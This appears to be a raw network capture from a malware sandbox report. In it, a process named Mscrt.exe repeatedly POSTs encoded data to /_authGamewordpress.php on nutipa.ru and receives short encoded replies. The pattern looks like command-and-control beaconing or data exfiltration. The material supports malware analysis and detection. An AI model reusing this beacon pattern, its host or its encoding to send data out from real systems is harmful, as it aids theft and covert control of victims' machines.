Dec 15, 2024 04:18:48.448355913 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 1424 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:18:48.795047998 CET	1424	OUT	Data Raw: 50 54 43 5b 5f 5b 58 5e 5d 5a 56 51 50 59 57 56 55 53 5e 46 5a 5e 5b 5d 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PTC[_[X^]ZVQPYWVUS^FZ^[]YY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^'+>"[*:76/=<4#Y<%>&X'>>=0;[3:<#1W,.F'#P #
Dec 15, 2024 04:18:49.565361023 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:18:49.804693937 CET	954	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F3vgK1%2Fj83zBw9o%2BhqEKooITjYyA2Q1DO6CT5G2DYDHe0odfkq7tgVb%2BoaAg4WmldC4VnYLQypynnhAGCAEwfe4PNBCwniW1rMj44dRqnjtg%2B%2F%2BnGXXkboJiPms%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2349deda9341ec-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=16930&min_rtt=11632&rtt_var=14959&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1744&delivery_rate=27025&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 06 1f 39 10 22 39 22 1e 37 10 2c 18 39 2f 31 50 3c 20 05 19 26 31 31 5b 24 28 27 5e 3d 2d 20 0c 26 17 0f 11 37 21 22 0f 2b 24 3d 59 26 36 21 51 03 11 22 59 31 3e 27 05 2b 2a 34 19 24 21 37 5f 25 2e 30 5c 28 38 29 0e 30 38 3f 1f 37 3e 0a 50 2d 14 30 5c 3f 14 37 5c 2f 2e 32 54 20 1c 2e 53 0c 17 25 5d 3f 3a 3a 59 23 31 25 56 24 05 23 53 23 39 2d 0f 3f 33 0e 1c 26 20 27 57 26 2e 16 1b 21 1e 0f 50 26 04 3d 02 23 0c 2e 50 3e 18 25 5c 20 05 2e 52 03 34 5d 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 989"9"7,9/1P< &11[$('^=- &7!"+$=Y&6!Q"Y1>'+*4$!7_%.0\(8)08?7>P-0\?7\/.2T .S%]?::Y#1%V$#S#9-?3& 'W&.!P&=#.P>%\ .R4]T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	49931	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:48.568702936 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:18:48.920243025 CET	2536	OUT	Data Raw: 50 5e 43 5b 5a 5b 58 56 5d 5a 56 51 50 59 57 51 55 52 5e 45 5a 54 5b 5d 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: P^C[Z[XV]ZVQPYWQUR^EZT[]YY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^')-9=\<!<-)-X!/4%=&-9W*0 0<9-+.F'#P #
Dec 15, 2024 04:18:49.743490934 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:18:49.978723049 CET	803	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CrBPsC8%2B7GkBAVKmc%2BIvZwkHB38GKQoJCLU4hmbxnjBquXkSo0mZMF%2BvvuQLm%2FiOKMW5lguVY2YiB6BSRpj5a%2BHkGbPrDTIBi%2FXcu3jqLooECriloOHlVAqwBVo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2349dffca742b7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=18359&min_rtt=14113&rtt_var=13785&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=30362&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	49935	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:50.238143921 CET	296	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue
Dec 15, 2024 04:18:50.591787100 CET	2536	OUT	Data Raw: 50 54 43 58 5f 5e 5d 53 5d 5a 56 51 50 5c 57 56 55 56 5e 44 5a 51 5b 5f 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PTCX_^]S]ZVQP\WVUV^DZQ[_YY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^$)-.Z)\#Y5(/[#4Y'>'.>(33'..Y( 6,+.F'#P 7
Dec 15, 2024 04:18:51.318840027 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:18:51.550719023 CET	800	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WjmvJ%2FwEdFArwGaB8vWg4qLb36jBx%2Fx1Z2%2B2hsO3eKM7ece5cfcbHkHRafZMmADphsxD%2BvUQvt12HopLbTuzhHCwS%2B0f1aU%2B1YL7Ft8np6YyCPPcFWP4JbQi9E0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2349e9c8cf9e08-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4052&min_rtt=1790&rtt_var=5197&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=73392&cwnd=162&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	49939	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:51.799701929 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:18:52.154330969 CET	2536	OUT	Data Raw: 55 50 46 5f 5f 5c 58 55 5d 5a 56 51 50 5d 57 5b 55 55 5e 44 5a 52 5b 53 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: UPF__\XU]ZVQP]W[UU^DZR[SYY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^'+:Y?:;"=)>+\4?Y&=%%.T= 3>-( %W/.F'#P 3
Dec 15, 2024 04:18:52.906717062 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:18:53.151343107 CET	793	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=STuHvfY%2BLNvOa%2F2BYM21q0cHqeJ2q5JLI5tzGNgn3gCuBvEBdBNCI0Bc321fU4e1Syu7OxpI048ptZny4s2XbFHrGVai952qC4MH6pdI0E2qHGAFbhgjnyZKpf4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2349f3b8b31879-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=8722&min_rtt=1885&rtt_var=14382&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=25800&cwnd=161&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	49945	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:53.402316093 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:18:53.748061895 CET	2536	OUT	Data Raw: 55 57 43 5c 5f 5d 5d 53 5d 5a 56 51 50 50 57 55 55 50 5e 45 5a 57 5b 5f 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: UWC\_]]S]ZVQPPWUUP^EZW[_YY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^$(.1*:#6/"?=(7Y'%=.^2>->$%=%+!U;.F'#P
Dec 15, 2024 04:18:54.487819910 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:18:54.723000050 CET	790	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BUSzoYHjHzvUbrVBKHpo3yU4nVniVIpiLkjrhvAi4dp8QzrOyDJ0zFGs4PVIddIGJZN8suN8wg%2BmdkHyJvImZ5FDfo7YDGq9p1BNNs3fRlIZYadmr8UCKNFmPVo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2349fd9b10c466-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4206&min_rtt=1613&rtt_var=5792&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=65286&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	49950	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:54.973053932 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:18:55.326230049 CET	2536	OUT	Data Raw: 50 55 43 5d 5f 59 58 54 5d 5a 56 51 50 51 57 51 55 5c 5e 46 5a 50 5b 5f 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PUC]_YXT]ZVQPQWQU\^FZP[_YY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^$+=!>8!<E(X &.-&>,$9(3/.F'#P
Dec 15, 2024 04:18:56.142858982 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:18:56.314388990 CET	798	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zjoiYnA7h8zZgczPELhTbX1PAsrdQI4FWZp0fJ%2BpV%2FGnfIK03VtTxA7eka7%2F9nE7ysJLtYFD4hk3L%2FYS3NrmXX6HrHaSkEJ9MWGb85OEVAueg0%2FHIBdr3DWTNMs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f234a0769f28c1b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3397&min_rtt=1796&rtt_var=3877&sent=4&recv=8&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=99931&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	49954	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:56.612104893 CET	296	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue
Dec 15, 2024 04:18:56.966826916 CET	2536	OUT	Data Raw: 50 5e 43 5e 5f 58 58 5e 5d 5a 56 51 50 5e 57 51 55 57 5e 47 5a 52 5b 53 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: P^C^_XX^]ZVQP^WQUW^GZR[SYY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^$)-"Z?)$5>@)- 7?'-.X1-V=3?_%."<*/;.F'#P ?
Dec 15, 2024 04:18:57.696187973 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:18:57.948188066 CET	792	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p%2B2RwSpX7H2yEeKuHA48nRvd%2BGoBpat1To863Z7Rmuozpyg0aOcvFvIo97glgQAr84qOp3FMb92zwursRDMXktvoVRDqsDYgWtKBHXidEsKEGyarQ2tyz2QmyfA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f234a11a8df4378-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3529&min_rtt=1565&rtt_var=4515&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=84495&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	49959	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:58.202738047 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:18:58.560544968 CET	2536	OUT	Data Raw: 50 55 46 5b 5f 59 5d 53 5d 5a 56 51 50 5d 57 54 55 55 5e 42 5a 5e 5b 5f 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PUF[_Y]S]ZVQP]WTUU^BZ^[_YY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^$_?2>:'[!/5+-/!/ [1>]%X2*U0%.X<#5/+.F'#P 3
Dec 15, 2024 04:18:59.288470030 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:18:59.522898912 CET	800	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vAu8yzei6dEfxAlJcAkhDUPpKK%2Bp%2B34UTntocTkj9OHxKtY82Ou015AX507vy3yDGt%2B7Ii%2Fw5Kys3kk%2BYfW%2Bnd3Dwyh0NlH6fKJxhM2nImfdTFununyb5xYn7NA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f234a1b9c8fde92-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3812&min_rtt=1665&rtt_var=4919&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=77482&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	49965	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:59.774457932 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	49966	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:59.979240894 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 1424 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:19:00.326196909 CET	1424	OUT	Data Raw: 50 54 43 5f 5f 58 58 5e 5d 5a 56 51 50 50 57 5a 55 57 5e 42 5a 54 5b 5e 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PTC__XX^]ZVQPPWZUW^BZT[^YY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^'+:*:?5(=3 '&-.&.%V( 3Z'>( %S/+.F'#P
Dec 15, 2024 04:19:01.064078093 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:19:01.308027029 CET	947	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:19:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FmU0sd6GAR8RO7Cc4ARrfIfiGMWb5tV6DBHneeL0dXAOu%2B7P5uhuj3uQARE%2BIG5BkuemevVK%2BLVZJksglVM306LJyMZZR%2B8kJ2TLUfaSLilesQKZYbuq9O0yftg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f234a26b8b772b1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4799&min_rtt=1965&rtt_var=6406&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1744&delivery_rate=59250&cwnd=166&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 06 1f 39 13 36 3a 0c 56 23 10 02 1b 2e 05 2a 0b 3c 20 27 1d 27 22 26 07 25 38 34 01 29 3d 01 1f 32 00 3d 11 23 22 0c 08 3e 37 31 1f 26 26 21 51 03 11 22 1d 31 2e 2c 1f 29 3a 23 02 31 0f 01 5e 24 3d 0a 5f 3c 3b 3a 57 26 38 38 0c 23 07 28 57 39 3a 23 05 29 39 34 02 2f 2e 32 57 34 36 2e 53 0c 17 25 1e 28 5f 3a 5a 23 22 25 13 33 02 1a 0f 37 39 3a 1f 3f 33 02 1d 33 30 3f 10 33 2e 3f 0b 20 30 22 0a 25 04 2e 1d 23 22 04 1d 3e 22 25 5c 20 05 2e 52 03 34 5d 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 9896:V#.*< ''"&%84)=2=#">71&&!Q"1.,):#1^$=_<;:W&88#(W9:#)94/.2W46.S%(_:Z#"%379:?330?3.? 0"%.#">"%\ .R4]T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	49967	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:19:00.104394913 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:19:00.452230930 CET	2536	OUT	Data Raw: 55 57 43 51 5f 5d 5d 55 5d 5a 56 51 50 59 57 5b 55 55 5e 47 5a 54 5b 5c 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: UWCQ_]]U]ZVQPYW[UU^GZT[\YY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^'<1?)'\"*+-Y Y'1!%X:(0#Z3\?0"/;.F'#P #
Dec 15, 2024 04:19:01.188997984 CET	25	IN	HTTP/1.1 100 Continue
